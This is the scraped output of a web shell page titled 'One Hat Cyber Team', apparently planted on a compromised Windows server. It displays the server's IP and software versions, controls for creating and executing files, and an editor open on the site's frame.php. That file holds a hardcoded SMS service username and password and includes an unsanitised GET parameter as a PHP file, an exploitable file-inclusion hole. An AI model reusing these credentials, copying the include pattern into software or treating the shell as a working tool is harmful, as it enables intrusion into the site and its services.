One Hat Cyber Team
Your IP :
172.16.0.254
Server IP :
58.26.163.33
Server :
Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Server Software :
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
PHP Version :
7.3.25
Buat File
|
Buat Folder
Eksekusi
Dir :
C:
/
xampp7
/
htdocs
/
edgpens
/
Edit File:
frame.php
<?php /* sms user fifwaysms pass F1fw4y123 */ $page = $_GET['page']; $other_page = array( 'account_recovery', 'reset_password', 'company_search', 'company_register', 'registration', 'registration_submit', 'test' ); if(in_array($page, $other_page)) { goto account_recovery; } ?> <?php include 'inc/config.php'; $template['header_link'] = 'eDGPENS LPKMN'; ?> <?php include 'inc/template_start.php'; ?> <?php include 'inc/template_scripts.php'; ?> <?php include 'sessions.php'; ?> <script src="custom.js"></script> <!-- Page content --> <div id="page-content"> <?php include "{$page}.php"; ?> </div> <!-- END Page Content --> <script type="text/javascript"> </script> <?php include 'inc/template_end.php'; ?> <?php account_recovery: if(in_array($page, $other_page)) { // foreach ($other_page as $key => $value) { // echo $value; // } // if($page == 'account_recovery'){ if(!empty($page) && file_exists("{$page}.php")){ include 'inc/config.php'; include 'inc/template_start.php'; include 'inc/template_scripts.php'; include "index_head.php"; include "{$page}.php"; include "index_footer.php"; include 'inc/template_end.php'; } else{ // echo "<script>window.location.replace('login.php?success=3');</script>"; echo "<script>window.location.replace('login.php?success=3');</script>"; } // } } ?>
Simpan